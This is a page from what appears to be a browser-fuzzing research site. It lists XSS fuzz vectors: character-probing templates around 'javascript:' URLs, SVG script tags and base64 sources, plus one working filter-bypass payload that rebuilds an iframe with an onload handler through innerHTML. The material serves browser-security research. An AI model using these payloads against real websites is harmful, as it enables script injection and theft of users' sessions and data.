Featured vector

No vectors found in the last 30 days

Fuzz vector cloud

5,457,354 Successful fuzzes

Fuzz Vectors

Searching for "obfusc"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
characters which turn into a comment <svg><script>lo<*chr*>gChr(*num*)</script></svg> @insertScript
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert